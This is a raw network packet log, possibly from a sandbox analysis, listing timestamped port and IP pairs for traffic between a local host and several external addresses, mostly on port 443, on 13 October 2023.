Oct 13, 2023 15:21:13.508393049 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.508425951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.508450031 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.508461952 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.508488894 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.508508921 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.508969069 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.508981943 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.509025097 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.509036064 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.509062052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.509459972 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.509599924 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.509618998 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.509670973 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.509682894 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.509708881 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.510190964 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.510216951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.510231018 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.510302067 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.510314941 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.510370970 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.511332035 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.511346102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.511418104 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.511430025 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.511486053 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.512110949 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.512124062 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.512186050 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516082048 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516098976 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516138077 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516160965 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516205072 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516217947 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516247988 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516274929 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516288042 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516311884 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516324997 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516362906 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516407013 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516477108 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516477108 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516496897 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516520977 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516540051 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516724110 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516738892 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516787052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.516798019 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.516823053 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517132044 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517148972 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517188072 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517205954 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517229080 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517246008 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517466068 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517481089 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517522097 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517538071 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517559052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517815113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517833948 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517874002 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.517889977 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.517913103 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.518161058 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.518172979 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.518213034 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.518225908 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.518249035 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.518497944 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.518568039 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.518580914 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.518620968 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.518641949 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.550621033 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.550638914 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.550745964 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.553569078 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.553579092 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.553606033 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.553659916 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.553699017 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.553711891 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.553841114 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.553884029 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.584884882 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.590259075 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.626815081 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.626868010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.626899958 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.626916885 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.628473043 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.628482103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.628504992 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.628544092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.628576040 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.628597021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.628974915 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.630549908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.630563974 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.630630016 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.630639076 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.630681992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.632675886 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.632693052 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.632760048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.632769108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.632810116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.634509087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.634526014 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.634587049 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.634596109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.634638071 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.636991024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.637006044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.637058973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.637069941 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.637089968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.637111902 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.638915062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.638928890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.638969898 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.638978004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.639010906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.639041901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.640690088 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.640703917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.640769005 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.640777111 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.640819073 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.642575979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.642600060 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.642647028 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.642653942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.642678022 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.642699003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.644680977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.644701958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.644799948 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.644809008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.644853115 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.646648884 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.646665096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.646725893 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.646734953 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.646784067 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.649040937 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.649055004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.649125099 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.649132967 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.649178982 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.651247025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.651288986 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.651323080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.651330948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.651352882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.651372910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.653744936 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.653760910 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.653809071 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.653816938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.653847933 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.653871059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.656347036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.656362057 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.656433105 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.656440020 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.656754017 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.659065962 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.659081936 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.659140110 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.659147978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.659194946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.661956072 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.661968946 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.662060976 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.662060976 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.662070990 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.662106991 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.664320946 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.664336920 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.664385080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.664392948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.664407969 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.664443970 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.667278051 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.667293072 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.667359114 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.667367935 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.667429924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.828810930 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:13.876152039 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:13.975743055 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.976067066 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.976305962 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:13.976399899 CEST	49740	443	192.168.2.5	172.67.139.220
Oct 13, 2023 15:21:13.976438999 CEST	443	49740	172.67.139.220	192.168.2.5
Oct 13, 2023 15:21:13.990056992 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.990066051 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.990087986 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.990238905 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.990238905 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.990271091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.991060972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.991808891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.991822958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.991883993 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.991900921 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.991947889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.994136095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.994149923 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.994216919 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.994225025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.994389057 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.996457100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.996470928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.996545076 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.996562958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.996606112 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.998631954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.998646021 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.998703003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:13.998712063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:13.998749971 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.000787020 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.000802040 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.000864983 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.000874043 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.000922918 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.003318071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.003330946 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.003408909 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.003418922 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.003462076 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.005656958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.005672932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.005728960 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.005738974 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.005908012 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.007616043 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.007632017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.007693052 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.007709980 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.007755995 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.009416103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.009428978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.009486914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.009499073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.009541035 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.011115074 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.011128902 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.011181116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.011188030 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.011231899 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.012722015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.012734890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.012792110 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.012799025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.012839079 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.014518023 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.014530897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.014585018 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.014592886 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.014633894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.016155958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.016169071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.016231060 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.016238928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.016278982 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.017926931 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.017940044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.018002987 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.018012047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.018054008 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.019701958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.019721031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.019797087 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.019804955 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.019840002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.021342039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.021354914 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.021420002 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.021428108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.021475077 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.023161888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.023175001 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.023236036 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.023242950 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.023286104 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.025280952 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.025295019 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.025341988 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.025350094 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.025407076 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.027086973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.027100086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.027159929 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.027168989 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.027210951 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.028856993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.028871059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.028928995 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.028935909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.028978109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.030550003 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.030565023 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.030612946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.030622959 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.030639887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.030662060 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.032377005 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.032391071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.032440901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.032448053 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.032479048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.032501936 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.034378052 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.034403086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.034441948 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.034451008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.034466028 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.034493923 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.036366940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.036381006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.036418915 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:14.036432981 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:14.036475897 CEST	49736	443	192.168.2.5	45.130.41.106
